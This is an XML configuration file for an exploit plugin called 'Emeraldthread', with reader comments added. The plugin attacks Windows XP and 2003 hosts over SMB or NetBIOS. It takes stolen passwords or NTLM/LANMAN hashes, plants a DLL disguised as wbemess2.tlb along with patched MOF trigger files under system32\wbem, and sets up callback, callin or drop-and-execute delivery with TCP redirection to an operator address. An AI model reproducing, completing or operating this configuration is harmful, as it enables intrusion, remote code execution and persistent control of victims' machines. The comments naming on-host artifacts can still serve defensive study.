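<?xml version="1.0" encoding="UTF-8"?>
<!--
  Emeraldthread plugin configuration, version 3.0.0 (configversion 3.0.0.0).

  Layout, in document order:
    inputparameters   values the operator supplies: network settings, credential
                      choice, payload delivery mode and source, and on-target paths.
    outputparameters  values the plugin reports back, keyed by payload type.
    redirection       TCP redirection rules expressed over the input parameters.
    logic             service and OS conditions under which this config applies,
                      plus the parameter values those conditions bind.

  Notes for the reader:
    * The "t" prefix is bound to the bare token "tc0" rather than a URI. It is kept
      verbatim because a consumer matches the namespace by this exact string.
    * The xsi prefix is declared but not used anywhere in this document.
    * The id attribute is 40 hex characters; how it is derived is not shown here.
    * Type names (S16, IPv4, TcpPort, UString, String, LocalFile, Socket, U8) belong
      to the plugin framework; their validation rules are not defined in this file.
-->
<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
          name="Emeraldthread"
          version="3.0.0"
          configversion="3.0.0.0"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns:t="tc0">

  <t:inputparameters>

    <!-- Network behaviour. -->
    <t:parameter name="NetworkTimeout"
                 description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
                 type="S16"
                 default="60"/>

    <!-- binding="//identifier" is the same path the local redirection rules use as
         destaddr; what "//identifier" resolves against is outside this file. -->
    <t:parameter name="TargetIp"
                 description="Target IP Address"
                 type="IPv4"
                 binding="//identifier"/>

    <!-- Transport choice. Each group declares its own TargetPort with the
         conventional default for that service; the logic block at the end of the
         file can set both Protocol and TargetPort from a detected service. -->
    <t:paramchoice name="Protocol"
                   default="SMB"
                   description="Protocol to connect to target with">
      <t:paramgroup name="SMB"
                    description="SMB over TCP">
        <t:parameter name="TargetPort"
                     description="Port used by SMB"
                     type="TcpPort"
                     default="445"/>
      </t:paramgroup>
      <t:paramgroup name="NBT"
                    description="Netbios over TCP">
        <t:parameter name="TargetPort"
                     description="Port used by Netbios"
                     type="TcpPort"
                     default="139"/>
      </t:paramgroup>
    </t:paramchoice>

    <!-- Credential choice. Unlike the other three paramchoice elements this one
         carries no default attribute; whether the consumer requires an explicit
         selection is not shown here. The "Password", "NTLM hash" and "Both hashes"
         groups take secret material (a cleartext password, or NTLM/LANMAN hashes in
         hex) as plain UString parameters, so any saved or logged copy of a filled-in
         config contains credentials. The Username and Password parameters have empty
         descriptions in the original and are left that way. Group names are display
         strings and may contain spaces ("No password", "NTLM hash", "Both hashes"). -->
    <t:paramchoice name="Credentials"
                   description="Type of credentials to use">
      <t:paramgroup name="Anonymous"
                    description="Anonymous (NULL session)"/>
      <t:paramgroup name="Guest"
                    description="Guest account"/>
      <t:paramgroup name="No password"
                    description="User account with no password set">
        <t:parameter name="Username"
                     description=""
                     type="UString"/>
      </t:paramgroup>
      <t:paramgroup name="Password"
                    description="Username and password">
        <t:parameter name="Username"
                     description=""
                     type="UString"/>
        <t:parameter name="Password"
                     description=""
                     type="UString"/>
      </t:paramgroup>
      <t:paramgroup name="NTLM hash"
                    description="Username and NTLM hash">
        <t:parameter name="Username"
                     description=""
                     type="UString"/>
        <t:parameter name="NTLMHash"
                     description="NTLM password hash (in hex)"
                     type="UString"/>
      </t:paramgroup>
      <t:paramgroup name="Both hashes"
                    description="Username, NTLM hash, and LANMAN hash">
        <t:parameter name="Username"
                     description=""
                     type="UString"/>
        <t:parameter name="NTLMHash"
                     description="NTLM password hash (in hex)"
                     type="UString"/>
        <t:parameter name="LANMANHash"
                     description="LANMAN password hash (in hex)"
                     type="UString"/>
      </t:paramgroup>
    </t:paramchoice>

    <!-- Delivery direction. Callback: the target connects out to CallbackIp and
         CallbackPort, with an optional local port. Callin: the target listens and
         the plugin connects in after ListenWait. DropAndExecute: nothing connects
         back, so only an optional contract string is carried.
         CallbackPort defaults to 0; what 0 means to the consumer is not defined in
         this file. ListenWait is typed S16 like NetworkTimeout, but its unit is not
         stated here. The ListenLocalPort description previously duplicated the
         ListenPort text; it now follows the CallbackLocalPort wording. -->
    <t:paramchoice name="PayloadType"
                   description="Callback from target or callin to target"
                   default="Callback">
      <t:paramgroup name="Callback"
                    description="Target calls back to plugin">
        <t:parameter name="CallbackIp"
                     description="Callback IP address"
                     type="IPv4"/>
        <t:parameter name="CallbackPort"
                     description="Callback port"
                     type="TcpPort"
                     default="0"/>
        <t:parameter name="CallbackLocalPort"
                     description="Local callback port"
                     type="TcpPort"
                     required="false"/>
      </t:paramgroup>
      <t:paramgroup name="Callin"
                    description="Target waits for call from plugin">
        <t:parameter name="ListenPort"
                     description="Listen port"
                     type="TcpPort"/>
        <t:parameter name="ListenLocalPort"
                     description="Local listen port"
                     type="TcpPort"
                     required="false"/>
        <t:parameter name="ListenWait"
                     description="Timeout to wait before trying to connect in."
                     type="S16"
                     default="10"/>
      </t:paramgroup>
      <t:paramgroup name="DropAndExecute"
                    description="Payload deployed with no feedback">
        <t:parameter name="PayloadContract"
                     description="Passthrough contract"
                     type="String"
                     required="false"/>
      </t:paramgroup>
    </t:paramchoice>

    <!-- Where the two on-target files come from. "File" reads them from local files
         (defaults esud.dll and nnetcfg.mof); "Inline" takes their contents as
         optional UString buffers. The DLLBuffer/MOFBuffer descriptions are copied
         from their File counterparts in the original. -->
    <t:paramchoice name="PayloadSource"
                   description="Payload source input type"
                   default="File">
      <t:paramgroup name="File"
                    description="Payloads provided by file">
        <t:parameter name="UnconfiguredDLL"
                     description="The unconfigured DLL file that will be written to target"
                     type="LocalFile"
                     default="esud.dll"/>
        <t:parameter name="ConfiguredMOF"
                     description="The patched mof file that will be written to target"
                     type="LocalFile"
                     default="nnetcfg.mof"/>
      </t:paramgroup>
      <t:paramgroup name="Inline"
                    description="Payloads provided inline">
        <t:parameter name="DLLBuffer"
                     description="The unconfigured DLL file that will be written to target"
                     type="UString"
                     required="false"/>
        <t:parameter name="MOFBuffer"
                     description="The patched mof file that will be written to target"
                     type="UString"
                     required="false"/>
      </t:paramgroup>
    </t:paramchoice>

    <!-- On-target locations. All three defaults live under the wbem directory of
         system32; together with the PayloadSource defaults they are the fixed
         file-name artifacts this config leaves on a host, which is what a defender
         would look for. Two of the defaults contain a literal "\.\" segment; they
         are reproduced verbatim since any normalisation happens in the consumer. -->
    <t:parameter name="RemoteDLLPath"
                 description="The path where we want the DLL to exist on target"
                 type="String"
                 default="\windows\system32\wbem\wbemess2.tlb"/>
    <t:parameter name="RemoteMOFPath"
                 description="The path where we want the patched mof file to exist on target"
                 type="String"
                 default="\windows\system32\wbem\.\mof\nnetcfg.mof"/>
    <t:parameter name="RemoteMOFTriggerPath"
                 description="The path where we want the mof trigger file to exist on target"
                 type="String"
                 default="\windows\system32\wbem\.\mof\evntprv.mof"/>

    <!-- The only parameter carrying a format attribute ("Scalar"); its meaning is
         not defined in this file. -->
    <t:parameter name="PrinterName"
                 description="The name of the printer on target"
                 type="UString"
                 format="Scalar"/>

  </t:inputparameters>

  <!-- Values the plugin produces, grouped by payload type. In the StagedUpload group
       Contract is pinned with value="StagedUpload"; in the DropAndExecute group
       Contract has no fixed value. The XorMask description and the DropAndExecute
       group description are empty in the original and are left that way. -->
  <t:outputparameters>
    <t:paramchoice name="PayloadType"
                   description="Payload type determines contract">
      <t:paramgroup name="StagedUpload"
                    description="Callin or Callback">
        <t:parameter name="ConnectedTcp"
                     description="Connected TCP Socket to target"
                     type="Socket"/>
        <t:parameter name="Contract"
                     description="Plugin contract"
                     type="String"
                     value="StagedUpload"/>
        <t:parameter name="XorMask"
                     description=""
                     type="U8"/>
      </t:paramgroup>
      <t:paramgroup name="DropAndExecute"
                    description="">
        <t:parameter name="Contract"
                     description="Plugin contract"
                     type="String"/>
      </t:paramgroup>
    </t:paramchoice>
  </t:outputparameters>

  <!-- TCP redirection rules written in terms of the input parameters.
       Rule 1 (local): listen on TargetIp:TargetPort with destination
         //identifier:TargetPort, kept open after completion.
       Rule 2 (local): listen on TargetIp:ListenLocalPort with destination
         //identifier:ListenPort. ListenLocalPort is optional in the inputs; how an
         unset value is handled is not shown here.
       Rule 3 (remote): listen on CallbackIp:CallbackPort with destination port
         CallbackLocalPort. It has no destaddr attribute, unlike the local rules; the
         consumer's default for that is not shown here. -->
  <t:redirection>
    <t:local protocol="Tcp"
             listenaddr="TargetIp"
             listenport="TargetPort"
             destaddr="//identifier"
             destport="TargetPort"
             closeoncompletion="false"/>
    <t:local protocol="Tcp"
             listenaddr="TargetIp"
             listenport="ListenLocalPort"
             destaddr="//identifier"
             destport="ListenPort"/>
    <t:remote protocol="Tcp"
              listenaddr="CallbackIp"
              listenport="CallbackPort"
              destport="CallbackLocalPort"/>
  </t:redirection>

  <!-- Applicability conditions: the config applies when a host exposes an smb or nbt
       service AND runs one of the listed Windows XP / Windows 2003 service-pack
       levels. Each branch also binds values: the service branches set Protocol and
       take TargetPort from the detected service's port; the OS branches set Target.
       Note that Target is bound here but is not declared among the input parameters
       above, and there is no entry for XP without a service pack or for anything
       newer than 2003 SP2, so hosts outside this set are out of scope for this
       config. -->
  <t:logic>
    <t:and>
      <t:or>
        <t:service name="smb">
          <t:bindtovalue name="Protocol" value="SMB"/>
          <t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
        </t:service>
        <t:service name="nbt">
          <t:bindtovalue name="Protocol" value="NBT"/>
          <t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
        </t:service>
      </t:or>
      <t:or>
        <t:os family="windows" name="Windows XP" servicepack="1">
          <t:bindtovalue name="Target" value="XPSP1"/>
        </t:os>
        <t:os family="windows" name="Windows XP" servicepack="2">
          <t:bindtovalue name="Target" value="XPSP2"/>
        </t:os>
        <t:os family="windows" name="Windows XP" servicepack="3">
          <t:bindtovalue name="Target" value="XPSP3"/>
        </t:os>
        <t:os family="windows" name="Windows 2003" servicepack="0">
          <t:bindtovalue name="Target" value="W2K3SP0"/>
        </t:os>
        <t:os family="windows" name="Windows 2003" servicepack="1">
          <t:bindtovalue name="Target" value="W2K3SP1"/>
        </t:os>
        <t:os family="windows" name="Windows 2003" servicepack="2">
          <t:bindtovalue name="Target" value="W2K3SP2"/>
        </t:os>
      </t:or>
    </t:and>
  </t:logic>

</t:config>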